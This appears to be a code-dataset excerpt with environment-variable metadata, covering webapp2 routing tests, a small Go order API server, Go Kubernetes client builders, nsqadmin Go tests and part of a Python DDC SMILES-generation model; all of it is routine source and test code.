rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 302)
self.assertEqual(
rsp.body,
b"""302 Moved Temporarily\n\n"""
b"""The resource was found at http://localhost/somewhere; """
b"""you should be redirected automatically. """
)
self.assertEqual(rsp.headers['Location'], 'http://localhost/somewhere')
self.assertEqual(rsp.headers['Set-Cookie'], 'a=b')
def test_run(self):
os.environ['REQUEST_METHOD'] = 'GET'
with mock.patch('webapp2.handlers.sys.stdin') as patched_stdin:
with mock.patch('webapp2.handlers.sys.stdout') as patched_stdout:
patched_stdin.return_value = getattr(
sys.stdin,
'buffer',
sys.stdin
)
patched_stdout.return_value = getattr(
sys.stdout,
'buffer',
sys.stdout
)
app.run()
# self.assertEqual(sys.stdout.read(), DEFAULT_RESPONSE)
def test_run_bare(self):
os.environ['REQUEST_METHOD'] = 'GET'
with mock.patch('webapp2.handlers.sys.stdin') as patched_stdin:
with mock.patch('webapp2.handlers.sys.stdout') as patched_stdout:
patched_stdin.return_value = getattr(
sys.stdin,
'buffer',
sys.stdin
)
patched_stdout.return_value = getattr(
sys.stdout,
'buffer',
sys.stdout
)
app.run(bare=True)
# self.assertEqual(sys.stdout.read(), DEFAULT_RESPONSE)
def test_run_debug(self):
debug = app.debug
app.debug = True
os.environ['REQUEST_METHOD'] = 'GET'
os.environ['PATH_INFO'] = '/'
with mock.patch('webapp2.handlers.sys.stdin') as patched_stdin:
with mock.patch('webapp2.handlers.sys.stdout') as patched_stdout:
patched_stdin.return_value = getattr(
sys.stdin,
'buffer',
sys.stdin
)
patched_stdout.return_value = getattr(
sys.stdout,
'buffer',
sys.stdout
)
app.run(bare=True)
# self.assertEqual(sys.stdout.read(), DEFAULT_RESPONSE)
app.debug = debug
'''
def test_get_valid_methods(self):
req = webapp2.Request.blank('http://localhost:80/')
req.app = app
app.set_globals(app=app, request=req)
handler = BrokenHandler(req, None)
handler.app = app
self.assertEqual(handler.get_valid_methods().sort(), ['GET'].sort())
handler = HomeHandler(req, None)
handler.app = app
self.assertEqual(handler.get_valid_methods().sort(),
['GET', 'POST'].sort())
handler = MethodsHandler(req, None)
handler.app = app
query_methods = [
'GET', 'POST', 'HEAD', 'OPTIONS', 'PUT', 'DELETE', 'TRACE']
self.assertEqual(
handler.get_valid_methods().sort(),
query_methods.sort()
)
'''
def test_uri_for(self):
class Handler(webapp2.RequestHandler):
def get(self, *args, **kwargs):
pass
req = webapp2.Request.blank('http://localhost:80/')
req.route = webapp2.Route('')
req.route_args = tuple()
req.route_kwargs = {}
req.app = app
app.set_globals(app=app, request=req)
handler = Handler(req, webapp2.Response())
handler.app = app
for func in (handler.uri_for,):
self.assertEqual(func('home'), '/')
self.assertEqual(func('home', foo='bar'), '/?foo=bar')
self.assertEqual(func('home', _fragment='my-anchor', foo='bar'),
'/?foo=bar#my-anchor')
self.assertEqual(func('home', _fragment='my-anchor'),
'/#my-anchor')
self.assertEqual(func('home', _full=True),
'http://localhost:80/')
self.assertEqual(func('home', _full=True, _fragment='my-anchor'),
'http://localhost:80/#my-anchor')
self.assertEqual(func('home', _scheme='https'),
'https://localhost:80/')
self.assertEqual(func('home', _scheme='https', _full=False),
'https://localhost:80/')
self.assertEqual(func('home',
_scheme='https',
_fragment='my-anchor'),
'https://localhost:80/#my-anchor')
self.assertEqual(func('methods'), '/methods')
self.assertEqual(func('methods', foo='bar'), '/methods?foo=bar')
self.assertEqual(func('methods',
_fragment='my-anchor', foo='bar'),
'/methods?foo=bar#my-anchor')
self.assertEqual(
func('methods', _fragment='my-anchor'),
'/methods#my-anchor'
)
self.assertEqual(
func('methods', _full=True),
'http://localhost:80/methods'
)
self.assertEqual(
func('methods', _full=True, _fragment='my-anchor'),
'http://localhost:80/methods#my-anchor'
)
self.assertEqual(
func('methods', _scheme='https'),
'https://localhost:80/methods'
)
self.assertEqual(func('methods', _scheme='https', _full=False),
'https://localhost:80/methods')
self.assertEqual(
func('methods', _scheme='https', _fragment='my-anchor'),
'https://localhost:80/methods#my-anchor'
)
self.assertEqual(
func('route-test', year='2010', month='0', name='test'),
'/2010/0/test'
)
self.assertEqual(
func('route-test', year='2010', month='07', name='test'),
'/2010/07/test'
)
self.assertEqual(
func('route-test',
year='2010', month='07', name='test', foo='bar'),
'/2010/07/test?foo=bar'
)
self.assertEqual(
func('route-test',
_fragment='my-anchor',
year='2010',
month='07',
name='test',
foo='bar'),
'/2010/07/test?foo=bar#my-anchor'
)
self.assertEqual(
func('route-test',
_fragment='my-anchor',
year='2010',
month='07',
name='test'),
'/2010/07/test#my-anchor'
)
self.assertEqual(
func('route-test',
_full=True,
year='2010',
month='07',
name='test'),
'http://localhost:80/2010/07/test'
)
self.assertEqual(
func('route-test',
_full=True,
_fragment='my-anchor',
year='2010',
month='07',
name='test'),
'http://localhost:80/2010/07/test#my-anchor'
)
self.assertEqual(
func('route-test',
_scheme='https',
year='2010',
month='07',
name='test'),
'https://localhost:80/2010/07/test'
)
self.assertEqual(
func('route-test',
_scheme='https',
_full=False,
year='2010',
month='07',
name='test'),
'https://localhost:80/2010/07/test'
)
self.assertEqual(
func('route-test',
_scheme='https',
_fragment='my-anchor',
year='2010',
month='07',
name='test'),
'https://localhost:80/2010/07/test#my-anchor'
)
def test_extra_request_methods(self):
allowed_methods_backup = app.allowed_methods
webdav_methods = ('VERSION-CONTROL', 'UNLOCK', 'PROPFIND')
for method in webdav_methods:
# It is still not possible to use WebDav methods...
req = webapp2.Request.blank('/webdav')
req.method = method
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 501)
# Let's extend ALLOWED_METHODS with some WebDav methods.
app.allowed_methods = tuple(app.allowed_methods) + webdav_methods
# self.assertEqual(
# sorted(webapp2.get_valid_methods(WebDavHandler)),
# sorted(list(webdav_methods)))
# Now we can use WebDav methods...
for method in webdav_methods:
req = webapp2.Request.blank('/webdav')
req.method = method
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, webapp2._to_utf8('Method: %s' % method))
# Restore initial values.
app.allowed_methods = allowed_methods_backup
self.assertEqual(len(app.allowed_methods), 7)
def test_escaping(self):
def get_req(uri):
req = webapp2.Request.blank(uri)
app.set_globals(app=app, request=req)
handler = webapp2.RequestHandler(req, None)
handler.app = req.app = app
return req, handler
req, handler = get_req('http://localhost:80/')
uri = webapp2.uri_for('escape', name='with space')
req, handler = get_req(uri)
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'with space')
req, handler = get_req('http://localhost:80/')
uri = webapp2.uri_for('escape', name='with+plus')
req, handler = get_req(uri)
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'with plus')
req, handler = get_req('http://localhost:80/')
uri = webapp2.uri_for('escape', name='with/slash')
req, handler = get_req(uri)
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'with/slash')
def test_handle_exception_with_error(self):
class HomeHandler(webapp2.RequestHandler):
def get(self, **kwargs):
raise TypeError()
def handle_exception(request, response, exception):
raise ValueError()
app = webapp2.WSGIApplication([
webapp2.Route('/', HomeHandler, name='home'),
], debug=False)
app.error_handlers[500] = handle_exception
req = webapp2.Request.blank('/')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 500)
def test_handle_exception_with_error_debug(self):
class HomeHandler(webapp2.RequestHandler):
def get(self, **kwargs):
raise TypeError()
def handle_exception(request, response, exception):
raise ValueError()
app = webapp2.WSGIApplication([
webapp2.Route('/', HomeHandler, name='home'),
], debug=True)
app.error_handlers[500] = handle_exception
req = webapp2.Request.blank('/')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 500)
def test_function_handler(self):
def my_view(request, *args, **kwargs):
return webapp2.Response('Hello, function world!')
def other_view(request, *args, **kwargs):
return webapp2.Response('Hello again, function world!')
def one_more_view(request, *args, **kwargs):
self.assertEqual(args, ())
self.assertEqual(kwargs, {'foo': 'bar'})
return webapp2.Response('Hello you too!')
app = webapp2.WSGIApplication([
webapp2.Route('/', my_view),
webapp2.Route('/other', other_view),
webapp2.Route('/one-more/<foo>', one_more_view)
])
req = webapp2.Request.blank('/')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'Hello, function world!')
# Twice to test factory.
req = webapp2.Request.blank('/')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'Hello, function world!')
req = webapp2.Request.blank('/other')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'Hello again, function world!')
# Twice to test factory.
req = webapp2.Request.blank('/other')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'Hello again, function world!')
req = webapp2.Request.blank('/one-more/bar')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'Hello you too!')
def test_custom_method(self):
class MyHandler(webapp2.RequestHandler):
def my_method(self):
self.response.out.write('Hello, custom method world!')
def my_other_method(self):
self.response.out.write('Hello again, custom method world!')
app = webapp2.WSGIApplication([
webapp2.Route('/', MyHandler, handler_method='my_method'),
webapp2.Route('/other', MyHandler,
handler_method='my_other_method'),
])
req = webapp2.Request.blank('/')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'Hello, custom method world!')
req = webapp2.Request.blank('/other')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'Hello again, custom method world!')
def test_custom_method_with_string(self):
handler = 'tests.resources.handlers.CustomMethodHandler:custom_method'
app = webapp2.WSGIApplication([
webapp2.Route('/', handler=handler),
webapp2.Route('/bleh', handler=handler),
])
req = webapp2.Request.blank('/')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'I am a custom method.')
req = webapp2.Request.blank('/bleh')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'I am a custom method.')
self.assertRaises(
ValueError, webapp2.Route, '/',
handler=handler,
handler_method='custom_method'
)
def test_factory_1(self):
app.debug = True
rsp = app.get_response('/bare')
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'I am not a RequestHandler but I work.')
app.debug = False
def test_factory_2(self):
"""Very crazy stuff. Please ignore it."""
class MyHandler(object):
def __init__(self, request, response):
self.request = request
self.response = response
def __new__(cls, *args, **kwargs):
return cls.create_instance(*args, **kwargs)()
@classmethod
def create_instance(cls, *args, **kwargs):
obj = object.__new__(cls)
if isinstance(obj, cls):
obj.__init__(*args, **kwargs)
return obj
def __call__(self):
return self
def dispatch(self):
self.response.write('hello')
app = webapp2.WSGIApplication([
webapp2.Route('/', handler=MyHandler),
])
req = webapp2.Request.blank('/')
rsp = req.get_response(app)
self.assertEqual(rsp.status_int, 200)
self.assertEqual(rsp.body, b'hello')
def test_encoding(self):
class PostHandler(webapp2.RequestHandler):
def post(self):
foo = self.request.POST['foo']
if not foo:
foo = 'empty'
self.response.write(foo)
app = webapp2.WSGIApplication([
webapp2.Route('/', PostHandler),
], debug=True)
# foo with umlauts in the vowels.
value = b'f\xc3\xb6\xc3\xb6'
rsp = app.get_response(
'/',
POST={'foo': value},
headers=[('Content-Type',
'application/x-www-form-urlencoded; charset=utf-8')]
)
self.assertEqual(rsp.unicode_body, u'föö')
self.assertEqual(rsp.body, value)
rsp = app.get_response(
'/',
POST={'foo': value},
headers=[('Content-Type', 'application/x-www-form-urlencoded')]
)
self.assertEqual(rsp.unicode_body, u'föö')
self.assertEqual(rsp.body, value)
if __name__ == '__main__':
unittest.main()
|
[] |
[] |
[
"PATH_INFO",
"REQUEST_METHOD"
] |
[]
|
["PATH_INFO", "REQUEST_METHOD"]
|
python
| 2 | 0 | |
cmd/main.go
|
package main
import (
"log"
"net/http"
"os"
"github.com/tgmendes/go4dummies/cmd/handlers"
)
func main() {
APIKey := os.Getenv("API_KEY")
Host := os.Getenv("HOST")
oh := handlers.OrderHandler{
EatStreetAPIKey: APIKey,
EatStreetHost: Host,
}
log.Println("starting server")
http.Handle("/api/orders", oh) // HL
http.HandleFunc("/api/restaurants/crawl", handlers.CrawlYelp) // HL
http.ListenAndServe(":8080", nil) // HL
}
|
[
"\"API_KEY\"",
"\"HOST\""
] |
[] |
[
"API_KEY",
"HOST"
] |
[]
|
["API_KEY", "HOST"]
|
go
| 2 | 0 | |
services/controller/internal/infra/k8s/client.go
|
package k8s
import (
"github.com/marcosQuesada/k8s-swarm/services/controller/internal/infra/k8s/generated/clientset/versioned"
log "github.com/sirupsen/logrus"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/rest"
"k8s.io/client-go/tools/clientcmd"
"os"
)
// BuildInternalClient instantiates internal K8s client
func BuildInternalClient() kubernetes.Interface {
restConfig, err := rest.InClusterConfig()
if err != nil {
log.Fatalf("unable to get In cluster config, error %v", err)
}
client, err := kubernetes.NewForConfig(restConfig)
if err != nil {
log.Fatalf("unable to build client from config, error %v", err)
}
return client
}
// BuildExternalClient instantiates local k8s client with user credentials
func BuildExternalClient() kubernetes.Interface {
kubeConfigPath := os.Getenv("HOME") + "/.kube/config"
config, err := clientcmd.BuildConfigFromFlags("", kubeConfigPath)
if err != nil {
log.Fatalf("unable to get cluster config from flags, error %v", err)
}
client, err := kubernetes.NewForConfig(config)
if err != nil {
log.Fatalf("unable to build client from config, error %v", err)
}
return client
}
// BuildSwarmInternalClient instantiates internal swarm client
func BuildSwarmInternalClient() versioned.Interface {
config, err := rest.InClusterConfig()
if err != nil {
log.Fatalf("unable to get In cluster config, error %v", err)
}
client, err := versioned.NewForConfig(config)
if err != nil {
log.Fatalf("unable to build client from config, error %v", err)
}
return client
}
// BuildSwarmExternalClient instantiates local swarm client with user credentials
func BuildSwarmExternalClient() versioned.Interface {
kubeConfigPath := os.Getenv("HOME") + "/.kube/config"
config, err := clientcmd.BuildConfigFromFlags("", kubeConfigPath)
if err != nil {
log.Fatalf("unable to get cluster config from flags, error %v", err)
}
client, err := versioned.NewForConfig(config)
if err != nil {
log.Fatalf("unable to build client from config, error %v", err)
}
return client
}
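// Illustrative usage sketch (assumes a reachable cluster and the standard
// client-go / apimachinery imports; shown as a comment only):
//
//	client := BuildExternalClient()
//	pods, err := client.CoreV1().Pods("default").List(context.TODO(), metav1.ListOptions{})
//	if err != nil {
//		log.Fatalf("unable to list pods, error %v", err)
//	}
//	log.Printf("found %d pods", len(pods.Items))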
|
[
"\"HOME\"",
"\"HOME\""
] |
[] |
[
"HOME"
] |
[]
|
["HOME"]
|
go
| 1 | 0 | |
src/github.com/nsqio/nsq/nsqadmin/nsqadmin_test.go
|
package nsqadmin
import (
"fmt"
"io/ioutil"
"net"
"net/http"
"net/url"
"os"
"os/exec"
"testing"
"github.com/nsqio/nsq/internal/test"
"github.com/nsqio/nsq/nsqd"
)
func TestNoLogger(t *testing.T) {
opts := NewOptions()
opts.Logger = nil
opts.HTTPAddress = "127.0.0.1:0"
opts.NSQLookupdHTTPAddresses = []string{"127.0.0.1:4161"}
nsqadmin := New(opts)
nsqadmin.logf(LOG_ERROR, "should never be logged")
}
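// The tests below exercise fatal start-up paths with a re-exec pattern: the test
// binary re-runs itself with BE_CRASHER=1 so that code calling log.Fatal/os.Exit
// runs in a child process, and the parent asserts only on the child's exit status.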
func TestNeitherNSQDAndNSQLookup(t *testing.T) {
if os.Getenv("BE_CRASHER") == "1" {
opts := NewOptions()
opts.Logger = nil
opts.HTTPAddress = "127.0.0.1:0"
New(opts)
return
}
cmd := exec.Command(os.Args[0], "-test.run=TestNeitherNSQDAndNSQLookup")
cmd.Env = append(os.Environ(), "BE_CRASHER=1")
err := cmd.Run()
test.Equal(t, "exit status 1", fmt.Sprintf("%v", err))
if e, ok := err.(*exec.ExitError); ok && !e.Success() {
return
}
t.Fatalf("process ran with err %v, want exit status 1", err)
}
func TestBothNSQDAndNSQLookup(t *testing.T) {
if os.Getenv("BE_CRASHER") == "1" {
opts := NewOptions()
opts.Logger = nil
opts.HTTPAddress = "127.0.0.1:0"
opts.NSQLookupdHTTPAddresses = []string{"127.0.0.1:4161"}
opts.NSQDHTTPAddresses = []string{"127.0.0.1:4151"}
New(opts)
return
}
cmd := exec.Command(os.Args[0], "-test.run=TestBothNSQDAndNSQLookup")
cmd.Env = append(os.Environ(), "BE_CRASHER=1")
err := cmd.Run()
test.Equal(t, "exit status 1", fmt.Sprintf("%v", err))
if e, ok := err.(*exec.ExitError); ok && !e.Success() {
return
}
t.Fatalf("process ran with err %v, want exit status 1", err)
}
func TestTLSHTTPClient(t *testing.T) {
nsqdOpts := nsqd.NewOptions()
nsqdOpts.TLSCert = "./test/server.pem"
nsqdOpts.TLSKey = "./test/server-key.pem"
nsqdOpts.TLSRootCAFile = "./test/ca.pem"
nsqdOpts.TLSClientAuthPolicy = "require-verify"
_, nsqdHTTPAddr, nsqd := mustStartNSQD(nsqdOpts)
defer os.RemoveAll(nsqdOpts.DataPath)
defer nsqd.Exit()
opts := NewOptions()
opts.HTTPAddress = "127.0.0.1:0"
opts.NSQDHTTPAddresses = []string{nsqdHTTPAddr.String()}
opts.HTTPClientTLSRootCAFile = "./test/ca.pem"
opts.HTTPClientTLSCert = "./test/client.pem"
opts.HTTPClientTLSKey = "./test/client-key.pem"
nsqadmin := New(opts)
nsqadmin.Main()
defer nsqadmin.Exit()
httpAddr := nsqadmin.RealHTTPAddr()
u := url.URL{
Scheme: "http",
Host: httpAddr.String(),
Path: "/api/nodes/" + nsqdHTTPAddr.String(),
}
resp, err := http.Get(u.String())
test.Equal(t, nil, err)
defer resp.Body.Close()
test.Equal(t, resp.StatusCode < 500, true)
}
func mustStartNSQD(opts *nsqd.Options) (*net.TCPAddr, *net.TCPAddr, *nsqd.NSQD) {
opts.TCPAddress = "127.0.0.1:0"
opts.HTTPAddress = "127.0.0.1:0"
opts.HTTPSAddress = "127.0.0.1:0"
if opts.DataPath == "" {
tmpDir, err := ioutil.TempDir("", "nsq-test-")
if err != nil {
panic(err)
}
opts.DataPath = tmpDir
}
nsqd := nsqd.New(opts)
nsqd.Main()
return nsqd.RealTCPAddr(), nsqd.RealHTTPAddr(), nsqd
}
func TestCrashingLogger(t *testing.T) {
if os.Getenv("BE_CRASHER") == "1" {
// Test invalid log level causes error
nsqdOpts := nsqd.NewOptions()
_, _, nsqd := mustStartNSQD(nsqdOpts)
defer os.RemoveAll(nsqdOpts.DataPath)
defer nsqd.Exit()
opts := NewOptions()
opts.LogLevel = "bad"
_ = New(opts)
return
}
cmd := exec.Command(os.Args[0], "-test.run=TestCrashingLogger")
cmd.Env = append(os.Environ(), "BE_CRASHER=1")
err := cmd.Run()
if e, ok := err.(*exec.ExitError); ok && !e.Success() {
return
}
t.Fatalf("process ran with err %v, want exit status 1", err)
}
type mockLogger struct {
Count int
}
func (l *mockLogger) Output(maxdepth int, s string) error {
l.Count++
return nil
}
func TestLogging(t *testing.T) {
nsqdOpts := nsqd.NewOptions()
_, nsqdHTTPAddr, nsqd := mustStartNSQD(nsqdOpts)
defer os.RemoveAll(nsqdOpts.DataPath)
defer nsqd.Exit()
logger := &mockLogger{}
opts := NewOptions()
opts.HTTPAddress = "127.0.0.1:0"
opts.NSQDHTTPAddresses = []string{nsqdHTTPAddr.String()}
opts.Logger = logger
// Test only fatal get through
opts.LogLevel = "FaTaL"
nsqadmin1 := New(opts)
logger.Count = 0
for i := 1; i <= 5; i++ {
nsqadmin1.logf(i, "Test")
}
test.Equal(t, 1, logger.Count)
// Test only warnings or higher get through
opts.LogLevel = "WARN"
nsqadmin2 := New(opts)
logger.Count = 0
for i := 1; i <= 5; i++ {
nsqadmin2.logf(i, "Test")
}
test.Equal(t, 3, logger.Count)
// Test everything gets through
opts.LogLevel = "debuG"
nsqadmin3 := New(opts)
logger.Count = 0
for i := 1; i <= 5; i++ {
nsqadmin3.logf(i, "Test")
}
test.Equal(t, 5, logger.Count)
// Test everything gets through with verbose = true
opts.LogLevel = "fatal"
opts.Verbose = true
nsqadmin4 := New(opts)
logger.Count = 0
for i := 1; i <= 5; i++ {
nsqadmin4.logf(i, "Test")
}
test.Equal(t, 5, logger.Count)
}
|
[
"\"BE_CRASHER\"",
"\"BE_CRASHER\"",
"\"BE_CRASHER\""
] |
[] |
[
"BE_CRASHER"
] |
[]
|
["BE_CRASHER"]
|
go
| 1 | 0 | |
dataset_generation/0_molecular_generation/ddc_pub/ddc_v3_unbiased.py
|
import os
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"  # Suppress UserWarning of TensorFlow while loading the model
import numpy as np
from datetime import datetime
from functools import wraps
import shutil, zipfile, tempfile, pickle
from tensorflow.keras.layers import (
Input,
Concatenate,
Dense,
TimeDistributed,
BatchNormalization,
)
from tensorflow.compat.v1.keras.layers import (
CuDNNLSTM as LSTM,
)
from tensorflow.keras.models import Model, load_model
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.callbacks import ReduceLROnPlateau, LearningRateScheduler
from tensorflow.keras.utils import multi_gpu_model, plot_model
# Custom dependencies
from molvecgen import SmilesVectorizer
from ddc_pub.generators import SmilesGenerator2
from ddc_pub.custom_callbacks import ModelAndHistoryCheckpoint, LearningRateSchedule
def timed(func):
"""
Timer decorator to benchmark functions.
"""
@wraps(func)
def wrapper(*args, **kwargs):
tstart = datetime.now()
result = func(*args, **kwargs)
elapsed = (datetime.now() - tstart).microseconds / 1e6
print("Elapsed time: %.3f seconds." % elapsed)
return result
return wrapper
class DDC:
def __init__(self, **kwargs):
"""
# Arguments
kwargs:
x : model input - np.ndarray of np.bytes_ or np.float64
y : model output - np.ndarray of np.bytes_
model_name : model filename to load - string
dataset_info : dataset information including name, maxlen and charset - hdf5
noise_std : standard deviation of the noise layer in the latent space - float
lstm_dim : size of LSTM RNN layers - int
dec_layers : number of decoder layers - int
            td_dense_dim : size of TD Dense layers in between the LSTM ones
                           to reduce the network size - int
batch_size : the network's batch size - int
codelayer_dim: dimensionality of the latent space or number of descriptors - int
# Examples of __init__ usage
To *train* a blank model with encoder (autoencoder):
model = ddc.DDC(x = mols,
y = mols,
dataset_info = info,
noise_std = 0.1,
lstm_dim = 256,
dec_layers = 3,
td_dense_dim = 0,
batch_size = 128,
codelayer_dim = 128)
To *train* a blank model without encoder:
model = ddc.DDC(x = descriptors,
y = mols,
dataset_info = info,
noise_std = 0.1,
lstm_dim = 256,
dec_layers = 3,
td_dense_dim = 0,
batch_size = 128)
To *re-train* a saved model with encoder (autoencoder):
model = ddc.DDC(x = mols,
y = mols,
model_name = saved_model_name)
To *re-train* a saved model without encoder:
model = ddc.DDC(x = descriptors,
y = mols,
model_name = saved_model_name)
To *test* a saved model:
model = ddc.DDC(model_name = saved_model_name)
"""
# Identify the mode to start the model in
if "x" in kwargs:
x = kwargs.get("x")
y = kwargs.get("y")
if "model_name" not in kwargs:
self.__mode = "train"
else:
self.__mode = "retrain"
elif "model_name" in kwargs:
self.__mode = "test"
else:
raise NameError("Cannot infer mode from arguments.")
print("Initializing model in %s mode." % self.__mode)
if self.mode == "train":
# Infer input type from type(x)
if type(x[0]) == np.bytes_:
print("Input type is 'binary mols'.")
self.__input_type = "mols" # binary RDKit mols
else:
print("Check input type.")
self.__input_type = "other" # other molecular descriptors
self.__maxlen = (
kwargs.get("dataset_info")["maxlen"] + 10
) # Extend maxlen to avoid breaks in training
self.__charset = kwargs.get("dataset_info")["charset"]
self.__dataset_name = kwargs.get("dataset_info")["name"]
self.__lstm_dim = kwargs.get("lstm_dim", 256)
self.__h_activation = kwargs.get("h_activation", "relu")
self.__bn = kwargs.get("bn", True)
self.__bn_momentum = kwargs.get("bn_momentum", 0.9)
self.__noise_std = kwargs.get("noise_std", 0.01)
self.__td_dense_dim = kwargs.get(
"td_dense_dim", 0
) # >0 squeezes RNN connections with Dense sandwiches
self.__batch_size = kwargs.get("batch_size", 256)
self.__dec_layers = kwargs.get("dec_layers", 2)
self.__codelayer_dim = kwargs.get("codelayer_dim", 128)
# Create the left/right-padding vectorizers
self.__smilesvec1 = SmilesVectorizer(
canonical=False,
augment=True,
maxlength=self.maxlen,
charset=self.charset,
binary=True,
)
self.__smilesvec2 = SmilesVectorizer(
canonical=False,
augment=True,
maxlength=self.maxlen,
charset=self.charset,
binary=True,
leftpad=False,
)
# self.train_gen.next() #This line is needed to set train_gen.dims (to be fixed in HetSmilesGenerator)
self.__input_shape = self.smilesvec1.dims
self.__dec_dims = list(self.smilesvec1.dims)
self.__dec_dims[0] = self.dec_dims[0] - 1
self.__dec_input_shape = self.dec_dims
self.__output_len = self.smilesvec1.dims[0] - 1
self.__output_dims = self.smilesvec1.dims[-1]
# Build data generators
self.__build_generators(x)
# Build full model out of the sub-models
self.__build_model()
# Retrain or Test mode
else:
self.__model_name = kwargs.get("model_name")
# Load the model
self.__load(self.model_name)
if self.mode == "retrain":
# Build data generators
self.__build_generators(x)
# Show the resulting full model
print(self.model.summary())
"""
Architecture properties.
"""
@property
def lstm_dim(self):
return self.__lstm_dim
@property
def h_activation(self):
return self.__h_activation
@property
def bn(self):
return self.__bn
@property
def bn_momentum(self):
return self.__bn_momentum
@property
def noise_std(self):
return self.__noise_std
@property
def td_dense_dim(self):
return self.__td_dense_dim
@property
def batch_size(self):
return self.__batch_size
@property
def dec_layers(self):
return self.__dec_layers
@property
def codelayer_dim(self):
return self.__codelayer_dim
@property
def steps_per_epoch(self):
return self.__steps_per_epoch
@property
def validation_steps(self):
return self.__validation_steps
@property
def input_shape(self):
return self.__input_shape
@property
def dec_dims(self):
return self.__dec_dims
@property
def dec_input_shape(self):
return self.__dec_input_shape
@property
def output_len(self):
return self.__output_len
@property
def output_dims(self):
return self.__output_dims
@property
def batch_input_length(self):
return self.__batch_input_length
#@batch_input_length.setter
#def batch_input_length(self, value):
# self.__batch_input_length = value
# self.__build_sample_model(batch_input_length=value)
"""
Models.
"""
@property
def sample_model(self):
return self.__sample_model
@property
def multi_sample_model(self):
return self.__multi_sample_model
@property
def model(self):
return self.__model
"""
Train properties.
"""
@property
def epochs(self):
return self.__epochs
@property
def clipvalue(self):
return self.__clipvalue
@property
def lr(self):
return self.__lr
@property
def h(self):
return self.__h
"""
Other properties.
"""
@property
def mode(self):
return self.__mode
@property
def dataset_name(self):
return self.__dataset_name
@property
def model_name(self):
return self.__model_name
@property
def input_type(self):
return self.__input_type
@property
def maxlen(self):
return self.__maxlen
@property
def charset(self):
return self.__charset
@property
def smilesvec1(self):
return self.__smilesvec1
@property
def smilesvec2(self):
return self.__smilesvec2
@property
def train_gen(self):
return self.__train_gen
@property
def valid_gen(self):
return self.__valid_gen
"""
Private methods.
"""
def __build_generators(self, x, split=0.81050343):
"""
Build data generators to be used in (re)training.
"""
# Split dataset into train and validation sets
cut = int(split * len(x))
x_train = x[:cut]
x_valid = x[cut:]
self.__train_gen = SmilesGenerator2(
x_train,
None,
self.smilesvec1,
self.smilesvec2,
batch_size=self.batch_size,
shuffle=True,
)
self.__valid_gen = SmilesGenerator2(
x_valid,
None,
self.smilesvec1,
self.smilesvec2,
batch_size=self.batch_size,
shuffle=True,
)
# Calculate number of batches per training/validation epoch
train_samples = len(x_train)
valid_samples = len(x_valid)
self.__steps_per_epoch = train_samples // self.batch_size
self.__validation_steps = valid_samples // self.batch_size
print(
"Model received %d train samples and %d validation samples."
% (train_samples, valid_samples)
)
def __build_model(self):
"""
RNN that generates random SMILES strings.
"""
# This is the start character padded OHE smiles for teacher forcing
decoder_inputs = Input(shape=self.dec_input_shape, name="Decoder_Inputs")
# I/O tensor of the LSTM layers
x = decoder_inputs
for dec_layer in range(self.dec_layers):
# RNN layer
decoder_lstm = LSTM(
self.lstm_dim,
return_sequences=True,
name="Decoder_LSTM_" + str(dec_layer),
)
x = decoder_lstm(x)
if self.bn:
x = BatchNormalization(
momentum=self.bn_momentum, name="BN_Decoder_" + str(dec_layer)
)(x)
# Squeeze LSTM interconnections using Dense layers
if self.td_dense_dim > 0:
x = TimeDistributed(
Dense(self.td_dense_dim), name="Time_Distributed_" + str(dec_layer)
)(x)
# Final Dense layer to return soft labels (probabilities)
outputs = Dense(self.output_dims, activation="softmax", name="Dense_Decoder")(x)
# Define the batch_model
self.__model = Model(inputs=[decoder_inputs], outputs=[outputs])
# Name it!
self.__model._name = "model"
def __build_sample_model(self, batch_input_length) -> dict:
"""
Model that predicts a single OHE character.
This model is generated from the modified config file of the self.batch_model.
Returns:
The dictionary of the configuration.
"""
self.__batch_input_length = batch_input_length
# Get the configuration of the batch_model
config = self.model.get_config()
# Keep only the "Decoder_Inputs" as single input to the sample_model
config["input_layers"] = [config["input_layers"][0]]
# Find decoder states that are used as inputs in batch_model and remove them
idx_list = []
for idx, layer in enumerate(config["layers"]):
if "Decoder_State_" in layer["name"]:
idx_list.append(idx)
# Pop the layer from the layer list
# Revert indices to avoid re-arranging after deleting elements
for idx in sorted(idx_list, reverse=True):
config["layers"].pop(idx)
# Remove inbound_nodes dependencies of remaining layers on deleted ones
for layer in config["layers"]:
idx_list = []
try:
for idx, inbound_node in enumerate(layer["inbound_nodes"][0]):
if "Decoder_State_" in inbound_node[0]:
idx_list.append(idx)
# Catch the exception for first layer (Decoder_Inputs) that has empty list of inbound_nodes[0]
except:
pass
# Pop the inbound_nodes from the list
# Revert indices to avoid re-arranging
for idx in sorted(idx_list, reverse=True):
layer["inbound_nodes"][0].pop(idx)
# Change the batch_shape of input layer
config["layers"][0]["config"]["batch_input_shape"] = (
batch_input_length,
1,
self.dec_input_shape[-1],
)
# Finally, change the statefulness of the RNN layers
for layer in config["layers"]:
if "Decoder_LSTM_" in layer["name"]:
layer["config"]["stateful"] = True
